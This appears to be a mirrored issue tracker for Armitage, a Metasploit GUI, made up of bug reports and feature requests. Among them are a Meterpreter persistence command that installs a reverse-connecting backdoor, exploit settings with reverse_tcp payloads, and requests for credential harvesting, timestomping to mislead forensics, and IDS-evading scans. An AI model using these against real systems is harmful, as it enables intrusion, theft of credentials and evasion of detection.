ccgreen13 / armitage Goto Github PK
View Code? Open in Web Editor NEWAutomatically exported from code.google.com/p/armitage
Automatically exported from code.google.com/p/armitage
This error happen to me 5 times today, but its a bit erratic
What steps will reproduce the problem?
1.nmap one host
2.search atacks by port
3. nmap another host
4. search attacks by port all TCP
5. go to step 3 two or tree times mores until it breaks.
What is the expected output? What do you see instead?
expected: usual behaviour.
instead: all previous hosts disappear , and then appear again for a couple of
seconds , and disappear again. and starts looping with this.
On command line with msfrcpd and artimage launched on background I see as
follows:
Device type: general purpose
Running: Linux 2.4.X
OS details: Linux 2.4.21 (Red Hat Enterprise Linux 3)
Network Distance: 2 hops
Service Info: OS: Linux
TRACEROUTE (using port 1025/tcp)
HOP RTT ADDRESS
1 0.42 ms xx.xx.xx.xx
2 0.34 ms xx.xx.xx.xx
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 155.21 seconds
Raw packets sent: 1032 (46.098KB) | Rcvd: 1027 (41.666KB)
Thread id: db.services -> {services=[Ljava.lang.Object;@1e91259}
java.lang.RuntimeException: Error reading response.
at msf.RpcConnection.readResp(RpcConnection.java:137)
at msf.RpcConnection.exec(RpcConnection.java:66)
at msf.RpcConnection.cacheExecute(RpcConnection.java:261)
at msf.RpcConnection.execute(RpcConnection.java:239)
at armitage.ArmitageTimer.readFromClient(ArmitageTimer.java:29)
at armitage.ArmitageTimer.run(ArmitageTimer.java:37)
at java.lang.Thread.run(Unknown Source)
Warning: Attempted to use foreach on non-array: '' at targets.sl:126
Warning: invalid use of index operator: 'success'['target_host'] at
targets.sl:46
Thread id: db.hosts -> null
java.lang.RuntimeException: Error reading response.
at msf.RpcConnection.readResp(RpcConnection.java:137)
at msf.RpcConnection.exec(RpcConnection.java:66)
at msf.RpcConnection.cacheExecute(RpcConnection.java:261)
at msf.RpcConnection.execute(RpcConnection.java:239)
at armitage.ArmitageTimer.readFromClient(ArmitageTimer.java:29)
at armitage.ArmitageTimer.run(ArmitageTimer.java:37)
at java.lang.Thread.run(Unknown Source)
Warning: invalid use of index operator: 'base64'['target_host'] at targets.sl:46
Warning: invalid use of index operator: ''['target_host'] at targets.sl:46
Warning: invalid use of index operator: 0['target_host'] at targets.sl:46
Warning: invalid use of index operator: 'bXNmID4g'['target_host'] at
targets.sl:46
Warning: invalid use of index operator: 'base64'['target_host'] at targets.sl:46
Warning: invalid use of index operator: ''['target_host'] at targets.sl:46
Warning: invalid use of index operator: 0['target_host'] at targets.sl:46
Warning: invalid use of index operator: 'bXNmID4g'['target_host'] at
targets.sl:46
Warning: Attempted to use foreach on non-array: '' at targets.sl:209
Warning: invalid use of index operator: 'base64'['target_host'] at targets.sl:46
Warning: invalid use of index operator: ''['target_host'] at targets.sl:46
Warning: invalid use of index operator: 0['target_host'] at targets.sl:46
Warning: invalid use of index operator: 'bXNmID4g'['target_host'] at
targets.sl:46
Warning: Attempted to use foreach on non-array: '' at targets.sl:209
Warning: invalid use of index operator: 'base64'['target_host'] at targets.sl:46
Warning: invalid use of index operator: ''['target_host'] at targets.sl:46
Warning: invalid use of index operator: 0['target_host'] at targets.sl:46
Warning: invalid use of index operator: 'bXNmID4g'['target_host'] at
targets.sl:46
Warning: Attempted to use foreach on non-array: '' at targets.sl:209
....
this goes on until I break it.
What version of Metasploit are you using (type: svn info)? On which
operating system?
armitage, metasploit and java version
marc.riera@wl183072:~/Code/armitage/armitage$ svn info
Path: .
URL: http://armitage.googlecode.com/svn/trunk/release/armitage-unix
Repository Root: http://armitage.googlecode.com/svn
Repository UUID: 957f4724-0442-2941-0443-fd1ab383608d
Revision: 55
Node Kind: directory
Schedule: normal
Last Changed Author: rsmudge
Last Changed Rev: 55
Last Changed Date: 2010-12-13 04:43:31 +0100 (Mon, 13 Dec 2010)
marc.riera@wl183072:~/Code/armitage/armitage$ cd ../msf/msf3/
marc.riera@wl183072:~/Code/armitage/msf/msf3$ svn info .
Path: .
URL: https://metasploit.com/svn/framework3/trunk
Repository Root: https://metasploit.com/svn
Repository UUID: 4d416f70-5f16-0410-b530-b9f4589650da
Revision: 11341
Node Kind: directory
Schedule: normal
Last Changed Author: darkoperator
Last Changed Rev: 11339
Last Changed Date: 2010-12-15 02:24:27 +0100 (Wed, 15 Dec 2010)
marc.riera@wl183072:~/Code/armitage/msf/msf3$ java -version
java version "1.6.0_23"
Java(TM) SE Runtime Environment (build 1.6.0_23-b05)
Java HotSpot(TM) Server VM (build 19.0-b09, mixed mode)
marc.riera@wl183072:~/Code/armitage/msf/msf3$
Which database are you using?
libdbd-mysql-ruby 0.4.4-1
mysql-server 5.1.49-1ubuntu8.1
Please provide any additional information below.
marc.riera@wl183072:~/Code/armitage/msf/msf3$ dpkg -l|grep -Ei 'mysql|ruby'
ii libbreakpoint-ruby1.8 0.5.1-2
Ruby library for adding breakpoints to Ruby 1.8 programs
ii libcmdparse2-ruby1.8 2.0.2-2
Advanced command line parsing module supporting sub-commands
ii libdaemons-ruby1.8 1.0.10-2
Ruby daemons library
ii libdataobjects-mysql-ruby 0.10.2-1
MySQL adapter for libdataobjects-ruby1.8
ii libdataobjects-mysql-ruby1.8 0.10.2-1
MySQL adapter for libdataobjects-ruby1.8
ii libdataobjects-postgres-ruby1.8 0.10.2-1
Postgres adapter for libdataobjects-ruby1.8
ii libdataobjects-ruby1.8 0.10.2-1
Rewrite Ruby database drivers to conform to a single interface
ii libdataobjects-sqlite3-ruby1.8 0.10.1.1-1
sqlite3 adapter for libdataobjects-ruby1.8
ii libdbd-mysql-perl 4.016-1
Perl5 database interface to the MySQL database
ii libdbd-mysql-ruby 0.4.4-1
Ruby/DBI MySQL driver
ii libdbd-mysql-ruby1.8 0.4.4-1
Ruby/DBI MySQL driver for Ruby 1.8
ii libdbi-ruby1.8 0.4.3-2
Database Independent Interface for Ruby 1.8
ii libdeprecated-ruby1.8 2.0.1-2
Library for handling deprecated code in Ruby 1.8
ii liblog4r-ruby1.8 1.0.5-8
A logging library for Ruby
ii libmmap-ruby1.8 0.2.6-3
Ruby interface to manage memory-mapped file objects
ii libmysql-ruby 2.8.2-1
MySQL module for Ruby
ii libmysql-ruby1.8 2.8.2-1
MySQL module for Ruby 1.8
ii libmysqlclient16 5.1.49-1ubuntu8.1
MySQL database client library
ii libncurses-ruby1.8 1.2.4-2
ruby Extension for the ncurses C library
ii libqt4-sql-mysql 4:4.7.0-0ubuntu4.2
Qt 4 MySQL database driver
ii libruby-extras 0.5
a bundle of additional libraries for Ruby
ii libruby1.8 1.8.7.299-2
Libraries necessary to run Ruby 1.8
ii libruby1.8-extras 0.5
a bundle of additional libraries for Ruby 1.8
ii mysql-admin 5.0r14+openSUSE-2.1
GUI tool for intuitive MySQL administration
ii mysql-client-5.1 5.1.49-1ubuntu8.1
MySQL database client binaries
ii mysql-client-core-5.1 5.1.49-1ubuntu8.1
MySQL database core client binaries
ii mysql-common 5.1.49-1ubuntu8.1
MySQL database common files, e.g. /etc/mysql/my.cnf
ii mysql-gui-tools-common 5.0r14+openSUSE-2.1
Architecture independent files for MySQL GUI Tools
ii mysql-query-browser 5.0r14+openSUSE-2.1
Official GUI tool to query MySQL database
ii mysql-server 5.1.49-1ubuntu8.1
MySQL database server (metapackage depending on the latest version)
ii mysql-server-5.1 5.1.49-1ubuntu8.1
MySQL database server binaries and system database setup
ii mysql-server-core-5.1 5.1.49-1ubuntu8.1
MySQL database server binaries
ii ruby 4.5
An interpreter of object-oriented scripting language Ruby
ii ruby1.8 1.8.7.299-2
Interpreter of object-oriented scripting language Ruby 1.8
ii rubygems 1.3.7-2
package management framework for Ruby libraries/applications
ii rubygems1.8 1.3.7-2
package management framework for Ruby libraries/applications
marc.riera@wl183072:~/Code/armitage/msf/msf3$
Original issue reported on code.google.com by [email protected]
on 15 Dec 2010 at 11:41
What steps will reproduce the problem?
Try to launch armitage via the executable on Windows 64-bit
What is the expected output? What do you see instead?
See screenshot.
Workaround: Use armitage-debug.bat to launch Armitage.
Original issue reported on code.google.com by [email protected]
on 30 Nov 2010 at 12:58
Attachments:
Once complete--respond to
http://twitter.com/#!/guerilla7/status/22909285176442880 with remediation or
shoulder shrug.
Original issue reported on code.google.com by [email protected]
on 6 Jan 2011 at 3:28
This is probably a quick and easy edit to your main java class.
Here's their howto:
http://download.oracle.com/javase/tutorial/uiswing/lookandfeel/plaf.html
This would make Armitage look prettier. That's it. But I'd appreciate it! :)
Original issue reported on code.google.com by [email protected]
on 18 Feb 2011 at 4:13
What steps will reproduce the problem?
1. Get a meterpreter session
2. try and upload a file with spaces using armitage's upload button
3.
What is the expected output? What do you see instead?
the expected output should be that the file gets uploaded.
here is what you see:
meterpreter> upload /root/Fix Virus.bat Fix Virus.bat
[-] Error running command upload: Errno::ENOENT No such file or directory -
/root/Fix
What version of Metasploit are you using (type: svn info)? On which
operating system?
URL: https://metasploit.com/svn/framework3/trunk
Repository Root: https://metasploit.com/svn
Repository UUID: 4d416f70-5f16-0410-b530-b9f4589650da
Revision: 11164
Node Kind: directory
Schedule: normal
Last Changed Author: darkoperator
Last Changed Rev: 11164
Last Changed Date: 2010-11-29 08:08:29 -0600 (Mon, 29 Nov 2010)
BT4 R2
Which database are you using?
msf3
Please provide any additional information below.
you can possibly solve this issue by putting quotes around the upload file.
Also as a feature request, could you provide a gui button for downloading a
file off of an exploited box using meterpreter as the payload.
Original issue reported on code.google.com by [email protected]
on 3 Dec 2010 at 8:58
What steps will reproduce the problem?
1. When use CSA like windows/browser/ms10_018_ie_behaviors.
2. Meterpreter load a random port to listen.
3. No conection for the victim becuse the firewall are blocking that port.
What is the expected output? What do you see instead?
The port to listen CSA is random, I want to choose that port.
What version of Metasploit are you using (type: svn info)? On which
operating system?
metasploit v3.6.0-dev [core:3.6 api:1.0]; BT4R2
Which database are you using?
MySQL
Please provide any additional information below.
I need more control to meterpreter options, many thabnks and great job!
Original issue reported on code.google.com by [email protected]
on 1 Feb 2011 at 4:17
1. Get a raw list of exploits: db_autopwn -T -R [min rank] [-p|-x]
2. Filter list by OS information
3. Sort list by rank
4. Use bind listeners where possible, if I can connect to throw the exploit, I
can connect to get my shell/meterpreter session
5. Execute by firing one or two off every 0.5 seconds or so (show a progress
bar)
Advantages:
- Avoids unnecessary exploits (db_autopwn ignores OS information). Armitage is
pretty smart about including multi/* exploits in its acceptable pool, so no
valid exploit option will be missed.
- Sorting will make sure a service is hit with the better exploit before a
weaker one can hit it.
- Use of a progress dialog will make it possible for users to cancel the
operation too.
Question: will ms08_067 fire off before other smb exploits in this scheme?
Original issue reported on code.google.com by [email protected]
on 21 Dec 2010 at 11:23
The multi/* seem to be the hardest to get right. The others should be
selectable based on their full name (e.g., osx/browser/whatever - use a generic
reverse shell payload or some such thing).
Also give the user the option of setting the "target" of the client-side attack.
Original issue reported on code.google.com by [email protected]
on 29 Dec 2010 at 3:36
What steps will reproduce the problem?
1. run the linux package or compile the source on a Mac
2. connect to the database (127.0.0.1)
3. see the following errors i/ in the console "[Fatal Error] :1:1: Content is
not allowed in prolog." and ii/ in the gui: "org.xml.sax.SAXParseException:
Content is not allowed in prolog"
Version info:
- MacOS X 10.6.5
- java version "1.6.0_22"
- Java(TM) SE Runtime Environment (build 1.6.0_22-b04-307-10M3261)
- Java HotSpot(TM) 64-Bit Server VM (build 17.1-b03-307, mixed mode)
What version of Metasploit are you using (type: svn info)?
URL: https://www.metasploit.com/svn/framework3/trunk
Repository Root: https://www.metasploit.com/svn
Repository UUID: 4d416f70-5f16-0410-b530-b9f4589650da
Revision: 11200
Node Kind: directory
Schedule: normal
Last Changed Author: jduck
Last Changed Rev: 11198
Last Changed Date: 2010-12-02 03:23:27 +0100 (Thu, 02 Dec 2010)
Which database are you using? MySQL 5.1.44
Original issue reported on code.google.com by [email protected]
on 2 Dec 2010 at 9:51
1. If I had a million dollars to pay you (that's what it'd cost if you
weren't so nice), I'd like you to add...
a cleanup option somewhere (once persistance is run)
2. Because this feature doesn't exist I have to...
manually look for the cleanup script and execute it.
3. If you add this feature It will...
be easier to manage persistant meterpreter sessions.
Original issue reported on code.google.com by [email protected]
on 30 Mar 2011 at 2:39
1. If I had a million dollars to pay you (that's what it'd cost if you
weren't so nice), I'd like you to add...
Some sort of directory/log parsing capability for the persistence script. (I'm
there is a better way to achieve persistence other then the persistence script,
but thats is how I've been doing it).
Currently a remove file gets added to a directory which stores the remove
script for the persistence script on the remote host. An graphical list that
grabs the files out of the directory and lists them would allow the user to
click the list item and/or a button to run the remove script.
2. Because this feature doesn't exist I have to...
Go to the directory that stores these remove scripts and run them.
For example, after running:
'meterpreter > run persistence -U -i 5 -p 443 -r 192.168.1.10'
...I will have a file in:
'/root/.msf3/logs/scripts/persistence/NICKSXP_20110105.3830/NICKSXP_20110105.383
0.rc'
...which I can run using:
'run multi_console_command -rc
/root/.msf3/logs/scripts/persistence/NICKSXP_20110105.3830/NICKSXP_20110105.3830
.rc'
...to remove the script so I don't leave unauthenticated backdoors around.
3. If you add this feature I will...
promise to look into better ways of doing stealth and persistence ;)
Original issue reported on code.google.com by [email protected]
on 5 Jan 2011 at 9:31
What steps will reproduce the problem?
1. installed Framework 3.6 incl. Armitage on MacOSX10.6.6., all installed
without problems
2. when run, Armitage will work for a little while and then the database will
produce: "FATAL: connection limit exceeded for non-superusers"
3. increased limit to 26 (max) but still not enough
4. after db error, Armitage does not work properly as exploits are skipped and
sessions not established
What is the expected output? What do you see instead?
"FATAL: connection limit exceeded for non-superusers" on PostgreSQL console
What version of Metasploit are you using (type: svn info)? On which
operating system?
Framework 3.6 on MacOSX 10.6.6.
Which database are you using?
PostgreSQL 8.4.7
Please provide any additional information below.
Some modules are just displayed in Java but not in Armitage:
Warning: 10.10.1.166 -> windows/smb/ms05_039_pnp -> %(LHOST => '10.10.1.116',
RPORT => 445, LPORT => 26707, RHOST => '10.10.1.166', PAYLOAD =>
'windows/meterpreter/bind_tcp', TARGET => '7', SMBPIPE => 'browser') at
attacks.sl:380
Warning: 10.10.1.166 -> windows/smb/ms10_061_spoolss -> %(LHOST =>
'10.10.1.116', RPORT => 445, LPORT => 23237, RHOST => '10.10.1.166', PAYLOAD =>
'windows/meterpreter/reverse_tcp', TARGET => '0', SMBPIPE => 'spoolss') at
attacks.sl:380
Warning: 10.10.1.203 -> windows/dcerpc/ms03_026_dcom -> %(LHOST =>
'10.10.1.116', RPORT => 135, LPORT => 31425, RHOST => '10.10.1.203', PAYLOAD =>
'windows/meterpreter/reverse_tcp', TARGET => '0') at attacks.sl:380
Warning: 10.10.1.166 -> windows/dcerpc/ms05_017_msmq -> %(LHOST =>
'10.10.1.116', RPORT => 2103, LPORT => 25287, RHOST => '10.10.1.166', PAYLOAD
=> 'windows/meterpreter/reverse_tcp', TARGET => '0') at attacks.sl:380
Warning: 10.10.1.166 -> windows/dcerpc/ms07_029_msdns_zonename -> %(LHOST =>
'10.10.1.116', RPORT => 0, LPORT => 5015, RHOST => '10.10.1.166', PAYLOAD =>
'windows/meterpreter/reverse_tcp', TARGET => '6', Locale => 'English') at
attacks.sl:380
Original issue reported on code.google.com by [email protected]
on 21 Feb 2011 at 2:50
The link should take users to this page. Maybe? Bug Reports... should be the
title. Or Issue Tracker. Not sure yet.
Original issue reported on code.google.com by [email protected]
on 29 Dec 2010 at 3:38
from techbytom.com, @thomas_ervin on twitter.
I've got some cool idea that may help reduce IDS detection for scans ;) I'm
working on that privately first but depending on how it goes I'd love to
incorporate that into Armitage as well. I'm guessing I'd need to export a list
of IPs? Could you specify a format so I can make sure to have it ready to plug
and play?
Two possible ways this could work with Armitage:
- File -> Import targets style (ok, and more compatible for other users)
- As a new discovery method baked into Armitage
Original issue reported on code.google.com by [email protected]
on 18 Feb 2011 at 4:25
1. If I had a million dollars to pay you (that's what it'd cost if you
weren't so nice), I'd like you to add...
An option for OpenBSD under host.
2. Because this feature doesn't exist I have to...
Use some other option like NetBSD.
3. If you add this feature I will...
Use it all the time?
Original issue reported on code.google.com by [email protected]
on 7 Jan 2011 at 12:11
The Armitage YAML parser rejects fields that have single quote characters in
them. This should be resolved in the next update.
Original issue reported on code.google.com by [email protected]
on 27 Feb 2011 at 9:35
This is a note to myself. During last night's demo, I changed the color
settings and everything looked ok. Later I saw that my shells had the default
color settings and not the settings I created.
Original issue reported on code.google.com by [email protected]
on 14 Dec 2010 at 11:05
1. If I had a million dollars to pay you (that's what it'd cost if you
weren't so nice), I'd like you to add...
add a sort function for the targets , like sort out the once that have open
ports etc
2. Because this feature doesn't exist I have to...
check every target manualy
3. If you add this feature I will...
kiss your ass xD
Original issue reported on code.google.com by [email protected]
on 16 Dec 2010 at 12:37
What steps will reproduce the problem?
On Backtrack 4.2
./msfrpcd -f -U msf -P test -t Basic
/etc/init.d/mysql start
cd /opt/armitage
java -jar armitage.jar
What is the expected output? What do you see instead?
Cannot start the connection:
Error reading response. (java)
I think XMLRPC is working correctly as this is the output:
[*] XMLRPC starting on 0.0.0.0:55553 (SSL):Basic...
What version of Metasploit are you using (type: svn info)? On which
operating system?
Which database are you using?
Please provide any additional information below.
Original issue reported on code.google.com by [email protected]
on 2 Dec 2010 at 1:22
What steps will reproduce the problem?
1.launch host scan "nmap all tcp ports"
2.using 4Gb ram with 32bits kernel pae
3.on the msf command line the error will rise when the RAM is eaten.
What is the expected output? What do you see instead?
The expected behavior is not to exit and finish the job instead. Using swap as
usual.
What version of Metasploit are you using (type: svn info)? On which
operating system?
here it goes armitage svn info and metasploit svn info, the last line is linux
kernel info.
marc.riera@wl183072:~/Code/armitage/armitage$ svn info
Path: .
URL: http://armitage.googlecode.com/svn/trunk/release/armitage-unix
Repository Root: http://armitage.googlecode.com/svn
Repository UUID: 957f4724-0442-2941-0443-fd1ab383608d
Revision: 55
Node Kind: directory
Schedule: normal
Last Changed Author: rsmudge
Last Changed Rev: 55
Last Changed Date: 2010-12-13 04:43:31 +0100 (Mon, 13 Dec 2010)
marc.riera@wl183072:~/Code/armitage/armitage$ cd ../msf/msf3/
marc.riera@wl183072:~/Code/armitage/msf/msf3$ svn info
Path: .
URL: https://metasploit.com/svn/framework3/trunk
Repository Root: https://metasploit.com/svn
Repository UUID: 4d416f70-5f16-0410-b530-b9f4589650da
Revision: 11330
Node Kind: directory
Schedule: normal
Last Changed Author: egypt
Last Changed Rev: 11330
Last Changed Date: 2010-12-14 18:26:44 +0100 (Tue, 14 Dec 2010)
marc.riera@wl183072:~/Code/armitage/msf/msf3$ uname -a
Linux wl183072 2.6.35-23-generic-pae #41-Ubuntu SMP Wed Nov 24 10:35:46 UTC
2010 i686 GNU/Linux
marc.riera@wl183072:~/Code/armitage/msf/msf3$
Which database are you using?
mysql server 5.1
Please provide any additional information below.
this app is doing a great job to help me check and tune our company security.
thanks.
Original issue reported on code.google.com by [email protected]
on 15 Dec 2010 at 9:00
Receive "Warning:Uncaught exception: java.awt.HeadlessException:No X11 Display
variable was set, but this program performed an operation which requires it. at
gui.sl:217" when I run Armitage in BT4R2 using either Postgresql or Mysql.
Original issue reported on code.google.com by [email protected]
on 17 Feb 2011 at 3:47
Hello,
May be the problem is in me... now lets try to talk in pictures becouse my
english is not so good to explain you what happens. Im trying already for 2
days.....
First i had other problem with mysqld.sock in var/usr/mysqld ... i've one day
qith this on a brand new bt4 r2 instalation :
ERROR 2002 (HY000): Can't connect to local MySQL server through socket
'/var/run/mysqld/mysqld.sock' (2)
But this is not your problem... :) Now mysql is running fine.
I very new in this thing so i assume that the problem may be in me... or may
be you missed something important in the MANUAL....
And why always asks for port 5432 in mysql... whathever i tryed also with this
port and nothing.
Ok im attaching the snapshots and i hope that you'll find the problem.... i so
impatient to run this ot the 2 systems... BT4 r2 and WIN7 32 bit.
Greetings mate...
Original issue reported on code.google.com by [email protected]
on 3 Jan 2011 at 12:53
Attachments:
1. If I had a million dollars to pay you (that's what it'd cost if you
weren't so nice), I'd like you to add...
you spoke on hack5 about importing scans from nmap into the database I have no
clue how to do this.
It would be really awsom if you could take the xml from nmap import it into
armitage with your normal file explorer and let armitage do the database stuf
this way you have best of both worlds in that the user can use nmap and see the
progress of their scan but yet be abble to use armitage without having to run
the scan a 2nd time within it as that is what I do at the moment.
Lewis McMahon [email protected]
ps really enjoyed you on hack5 was a great episode and realy enjoying armatage
Original issue reported on code.google.com by [email protected]
on 21 Jan 2011 at 9:25
What steps will reproduce the problem?
1. Download Linux Version
2. Attempt to run Armitage
3.
What is the expected output? What do you see instead?
Expected program to open. instead, recieve this error.
root@example-laptop:~/# ./armitage.sh
*** File: scripts/attacks.sl
Error: Class TableRowSorter was not found at line 192
TableRowSorter
What version of Metasploit are you using (type: svn info)? On which
operating system?
Latest version of MSF,
Which database are you using?
PostgreSQL
Please provide any additional information below.
Original issue reported on code.google.com by [email protected]
on 1 Dec 2010 at 12:12
Armitage uses a module launcher dialog for exploits, payloads, and auxiliary
modules. Some of the entries in the key/value table have a tooltip that states
which values are allowed.
In these cases, Armitage should extract these values and place them into a
combobox when the user is editing that key. This way the user can just select
which value is valid (instead of having to guess or fat-finger from the
tooltip).
These fields end with: (accepted: [values])
I believe these comma separated values can be parsed out and used to make the
UX a little better.
Original issue reported on code.google.com by [email protected]
on 21 Dec 2010 at 11:26
What steps will reproduce the problem?
1.
2.
3. when clik on connect ...
What is the expected output? What do you see instead?
[-]Invalid driver specified
What version of Metasploit are you using (type: svn info)? On which
operating system?
root@bt:/pentest/exploits/framework3# svn info
Path: .
URL: https://metasploit.com/svn/framework3/trunk
Repository Root: https://metasploit.com/svn
Repository UUID: 4d416f70-5f16-0410-b530-b9f4589650da
Revision: 10845
Node Kind: directory
Schedule: normal
Last Changed Author: hdm
Last Changed Rev: 10844
Last Changed Date: 2010-10-29 06:14:22 +0200 (Fri, 29 Oct 2010)
... on BackTrack 4 R2
Which database are you using?
Mysql embedded on BT4 R2
Please provide any additional information below.
Original issue reported on code.google.com by [email protected]
on 3 Dec 2010 at 7:52
Attachments:
Using MSF, one can collect Firefox, IE, Pidgin (etc) stored credential and
history files. Why not having this in Armitage?
Original issue reported on code.google.com by [email protected]
on 24 Feb 2011 at 9:26
What steps will reproduce the problem?
1. Install armitage (as shown in tutorial) in Windows 7.
2. Run msfconsole first.
3. Run armitage.bat
What is the expected output? What do you see instead?
After clicking "Start MSF", nothing comes on.
What version of Metasploit are you using (type: svn info)? On which
operating system?
Metasploit Rev 11705
OS - Windows 7
Which database are you using?
Postgresql
Please provide any additional information below.
On running "java -jar armitage.jar" (with PATH and JAVA_HOME set correctly):
Exception in thread "Thread-4" java.lang.reflect.UndeclaredThrowableException
at $Proxy1.run(Unknown Source)
at java.lang.Thread.run(Thread.java:662)
Caused by: java.io.FileNotFoundException:
C:\framework\msf3\data\armitage\E:\.armitage.prop (The filename, directory
name, or volume label syntax is incorrect)
at java.io.FileOutputStream.open(Native Method)
at java.io.FileOutputStream.<init>(FileOutputStream.java:179)
at java.io.FileOutputStream.<init>(FileOutputStream.java:70)
at sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
at sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:39)
at sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:27)
at java.lang.reflect.Constructor.newInstance(Constructor.java:513)
at sleep.engine.atoms.ObjectNew$ConstructorCallRequest.execute(Unknown Source)
at sleep.engine.CallRequest.CallFunction(Unknown Source)
at sleep.engine.atoms.ObjectNew.evaluate(Unknown Source)
at sleep.engine.Block.evaluate(Unknown Source)
at sleep.engine.Block.evaluate(Unknown Source)
at sleep.bridges.SleepClosure.evaluate(Unknown Source)
at sleep.engine.CallRequest$FunctionCallRequest.execute(Unknown Source)
at sleep.engine.CallRequest.CallFunction(Unknown Source)
at sleep.engine.atoms.Call.evaluate(Unknown Source)
at sleep.engine.Block.evaluate(Unknown Source)
at sleep.engine.Block.evaluate(Unknown Source)
at sleep.engine.atoms.Decide.evaluate(Unknown Source)
at sleep.engine.Block.evaluate(Unknown Source)
at sleep.engine.Block.evaluate(Unknown Source)
at sleep.bridges.SleepClosure.evaluate(Unknown Source)
at sleep.engine.ProxyInterface.invoke(Unknown Source)
... 2 more
Original issue reported on code.google.com by [email protected]
on 4 Feb 2011 at 10:50
1. If I had a million dollars to pay you (that's what it'd cost if you
weren't so nice), I'd like you to add...
More advanced tab closure, such as close all but this, close all, close all to
the right, etc.
2. Because this feature doesn't exist I have to...
Manually close each tab.
3. If you add this feature I will...
Be able to save a lot of time.
Original issue reported on code.google.com by [email protected]
on 23 Jan 2011 at 7:07
This needs to be verified. A quick look at the code leads me to believe it may
not work.
Original issue reported on code.google.com by [email protected]
on 23 Dec 2010 at 2:39
Play a "Hacked" voice when a post is compromized
Original issue reported on code.google.com by [email protected]
on 21 Feb 2011 at 8:50
What steps will reproduce the problem?
1. Armitage with a very very slow performance on a non VM box
2. Mouse right clicks takes forever for example to use the stack function
3. Host menu functions take forever to transmit the gui example MFS scans popup
requiring network segmentation input take a long time to appear.
What is the expected output? What do you see instead?
This happened in ubuntu meerkat 10.10 Linux ptcasnxpt1079 2.6.35-25-generic
#44-Ubuntu SMP Fri Jan 21 17:40:44 UTC 2011 x86_64 GNU/Linux
and on a sandbox environment also after performing the msfupdate. After the
update things got complicated as within the VM BT4Rc2 and within Meerkat Ubuntu.
What version of Metasploit are you using (type: svn info)? On which
operating system?
version =[ metasploit v3.7.0-dev [core:3.7 api:1.0] +[ svn r12214 updated
today (2011.04.01)
Which database are you using?
Postgresql
Please provide any additional information below.
Original issue reported on code.google.com by [email protected]
on 2 Apr 2011 at 12:45
Armitage is now distributed with the Metasploit Framework. Eventually, when
they respin the distro, a new script to start it will be included. This script
will make sure "start msfrpcd" works and Armitage automatically knows the
postgresql parameters. This script already exists.
This ticket is here to remind me to respin the Armitage Windows distro to
include these scripts and provide install instructions pointing users to unzip
Armitage over their Metasploit directory. By doing this they can just have
everything work beautifully.
Original issue reported on code.google.com by [email protected]
on 6 Jan 2011 at 1:24
Timestomping is useful for confusing forensic guys. I think it would be great
to have this in Armitage's file browser.
Original issue reported on code.google.com by [email protected]
on 24 Feb 2011 at 9:23
What steps will reproduce the problem?
1.Use Armitage on Windows
2.Run a Psexec with credentials (valid)
3.It shows as a job, but the host doesnt turn red
What is the expected output? What do you see instead?
Nothing, just a Job session
What version of Metasploit are you using (type: svn info)? On which
operating system?
Latest one as for November 30 2010
Which database are you using?
Postgres
Please provide any additional information below.
Original issue reported on code.google.com by [email protected]
on 30 Nov 2010 at 3:30
What steps will reproduce the problem?
1.download the zip file for windows
2.attempt to extract it
What is the expected output? What do you see instead?
corrupted zip file
What version of Metasploit are you using (type: svn info)? On which
operating system?
xp
Which database are you using?
local
Please provide any additional information below.
Original issue reported on code.google.com by [email protected]
on 10 Feb 2011 at 2:20
The title explains it. Also, verify that .NET server and Windows 2008 both get
the right icon.
meterpreter> sysinfo
Computer: WIN-I4LVV3P01RG
OS : Windows 7 (Build 7600, ).
Arch : x86
Language: en_US
------------------
rpreter> sysinfo
Computer: ACME-14E429D2B5
OS : Windows XP (Build 2600, Service Pack 2).
Arch : x86
Language: en_US
--------------------
meterpreter> sysinfo
Computer: ACME-TSOVK3HCPS
OS : Windows 2000 (Build 2195, ).
Arch : x86
Language: en_US
--------------------
meterpreter> sysinfo
Computer: HACKER-8B148A5F
OS : Windows .NET Server (Build 3790, Service Pack 2).
Arch : x86
Language: en_US
Original issue reported on code.google.com by [email protected]
on 24 Dec 2010 at 5:28
What steps will reproduce the problem?
1. Start Armitage with the MySQL database on Backtrack R42
2. Go to Hosts -> MSF Scans and enter the local subnet
What is the expected output? What do you see instead?
The Armitage UI lags terribly. It should be snappier. When PostgreSQL is
running this problem isn't evident.
What version of Metasploit are you using (type: svn info)? On which
operating system?
root@bt:/pentest/exploits/framework3# svn info .
Path: .
URL: https://metasploit.com/svn/framework3/trunk
Repository Root: https://metasploit.com/svn
Repository UUID: 4d416f70-5f16-0410-b530-b9f4589650da
Revision: 11159
Node Kind: directory
Schedule: normal
Last Changed Author: scriptjunkie
Last Changed Rev: 11153
Last Changed Date: 2010-11-25 10:48:05 -0500 (Thu, 25 Nov 2010)
Which database are you using?
msf > db_status
[*] mysql connected to msf32
Please provide any additional information below.
Reducing the threads/module from 24 to 8 seems to fix this. As a work-around,
users should use the PostgreSQL database instead.
Original issue reported on code.google.com by [email protected]
on 29 Nov 2010 at 2:31
What steps will reproduce the problem?
1. Exploited target with payload=windows/meterpreter/reverse_tcp
2. Loaded Exploit multi/handler with Reverse Connection
3. Meterpreter session starts on Armitage console
4. At Meterpreter> prompt, no commands work, and there are no options other
than "Meterpreter Shell" under Attack when right-clicking the target which is
red with lightning bolts
What is the expected output? What do you see instead?
All commands return nothing. No additional errors are generated.
What version of Metasploit are you using (type: svn info)? On which
operating system?
URL: https://metasploit.com/svn/framework3/trunk
Repository Root: https://metasploit.com/svn
Repository UUID: 4d416f70-5f16-0410-b530-b9f4589650da
Revision: 11889
Node Kind: directory
Schedule: normal
Last Changed Author: hdm
Last Changed Rev: 11889
Last Changed Date: 2011-03-06 20:46:51 -0600 (Sun, 06 Mar 2011)
Running on Backtrack 4R2
Which database are you using?
MySQL
Please provide any additional information below.
Functions perfectly when I create the same multi/handler with msfconsole.
Original issue reported on code.google.com by [email protected]
on 26 Mar 2011 at 2:22
I'd like you to add OpenVas/NeXpose/Nessus/Amap scan options in "Hosts" (like
"Nmap Scan" in "Hosts")
I believe Armitage is about ease of use, so why not integrating other useful
discovery tools in it? Such tools make the exploitation process more accurate
and fast.
Original issue reported on code.google.com by [email protected]
on 20 Feb 2011 at 3:40
Hi im telling that windows vista have a problem,the say me the vulnerabilities
